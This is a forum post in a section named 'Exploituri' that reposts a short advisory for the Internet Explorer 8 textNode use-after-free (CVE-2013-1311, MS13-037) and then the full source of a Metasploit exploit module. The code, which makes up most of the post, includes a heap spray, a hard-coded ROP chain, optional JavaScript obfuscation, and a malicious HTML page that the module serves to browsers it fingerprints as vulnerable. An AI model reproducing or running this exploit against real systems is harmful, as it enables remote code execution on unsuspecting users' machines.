Jump to content
thehat

Microsoft Internet Explorer textNode Use-After-Free

By thehat, in Exploituri

Recommended Posts

thehat Newbie

thehat

Posted
Posted

Microsoft Internet Explorer CVE-2013-1311 Use-After-Free Remote Code Execution Vulnerability

Microsoft Internet Explorer is prone to a remote code-execution vulnerability.

Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.

Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.

Internet Explorer 8 is vulnerable.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::RopDb

    def initialize(info={})
        super(update_info(info,
            'Name'           => "MS13-037 Microsoft Internet Explorer textNode Use-After-Free",
            'Description'    => %q{
                This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
                where a DOM textNode pointer becomes corrupted after style computation. This pointer is then overwritten when the innerHTML property on the parent object is set.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
                ],
            'References'     =>
                [
                    [ 'CVE', '2013-1311' ],
                    [ 'MSB', 'MS13-037' ],
                    [ 'URL', 'http://security-assessment.com/files/documents/advisory/ms13_037_ie_textnode_uaf.pdf' ]
                ],
            'Payload'     =>
                {
                    'BadChars'       => "\x00",
                    'Space'          => 812,
                    'DisableNops'    => true,
                    'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
                },
            'DefaultOptions'  =>
                {
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Platform'    => 'win',
            'Targets'     =>
                [
                    [ 'Automatic', {} ],
                    [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
                ],
            'Privileged'      => false,
            'DisclosureDate'  => "June 6 2013",
            'DefaultTarget'   => 0))

        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)

    end

    def get_target(agent)
        #If the user is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

        nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
        ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

        ie_name = "IE #{ie}"

        case nt
        when '5.1'
            os_name = 'Windows XP SP3'
        end

        targets.each do |t|
            if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
                print_status("Target selected as: #{t.name}")
                return t
            end
        end

        return nil
    end

    def heap_spray(my_target, p)
        js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
        js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

        js = %Q|

            var heap_obj = new heapLib.ie(0x20000);
            var code = unescape("#{js_code}");
            var nops = unescape("#{js_nops}");
            while (nops.length < 0x80000) nops += nops;
            var offset = nops.substring(0, #{my_target['Offset']});
            var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
            while (shellcode.length < 0x40000) shellcode += shellcode;
            var block = shellcode.substring(0, (0x80000-6)/2);
            heap_obj.gc();
            for (var i=1; i < 0x300; i++) {
                heap_obj.alloc(block);
            }
            var overflow = nops.substring(0, 10);

        |

        js = heaplib(js, {:noobfu => true})

        if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate

        end

        return js
    end

    def get_payload(t, cli)
        code = payload.encoded

        # No rop. Just return the payload.
        return code if t['Rop'].nil?

        # ROP chain generated by mona.py - See corelan.be
        case t['Rop']
        when :msvcrt
            print_status("Using msvcrt ROP")

            stack_pivot = [
            0x77c1cafb, # POP EBP # RETN [msvcrt.dll]
            0x41414141, # Junk
            0x781a04cb # POP ECX # PUSH ESP # RETN [urlmon.dll]
            ].pack("V*")

            # Set up required heap layout
            junk = "#{Rex::Text.rand_text_alpha(4)}"
            null = "\x00"*4
            valid_ptr = [0x0c0c0c0c].pack("V*")
            offset = [0x0c0c0c6c].pack("V*")
            heap_foo = junk*5 +
                valid_ptr*2 +
                junk +
                offset +
                junk*4 +
                valid_ptr +
                junk*6 +
                valid_ptr +
                null +
                junk*2

            rop_payload = heap_foo << generate_rop_payload('msvcrt', "", {'pivot'=>stack_pivot, 'target'=>'xp'})
            rop_payload << code
        end

        return rop_payload
    end

    def get_exploit(my_target, cli)
        p  = get_payload(my_target, cli)
        js = heap_spray(my_target, p)

        html = %Q|
        <!doctype html>
        <html>
        <head>
        <script>
        #{js}
        function exploit() {
            var obj = document.createElement('s')
            obj.innerHTML = "??"
            document.body.appendChild(obj)

            document.styleSheets[0].cssText = "body:first-line{color:blue}"
            CollectGarbage()

            setTimeout(function(){
                for (i=0;i<1000;i++){
                    obj.innerHTML = "\\u0c2c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c";
                }
            }, 500)
        }
        </script>
        <style>
        </style>
        </head>
        <body onload='setTimeout("exploit()", 2000)'>
        </body>
        </html>
        |

        return html
    end


    def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        uri   = request.uri
        print_status("Requesting: #{uri}")

        my_target = get_target(agent)
        # Avoid the attack if no suitable target found
        if my_target.nil?
            print_error("Browser not supported, sending 404: #{agent}")
            send_not_found(cli)
            return
        end

        html = get_exploit(my_target, cli)
        html = html.gsub(/^\t\t/, '')
        print_status "Sending HTML..."
        send_response(cli, html, {'Content-Type'=>'text/html'})

    end

end

Sursa: http://www.securityfocus.com/bid/59752/discuss

Microsoft Internet Explorer textNode Use-After-Free

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...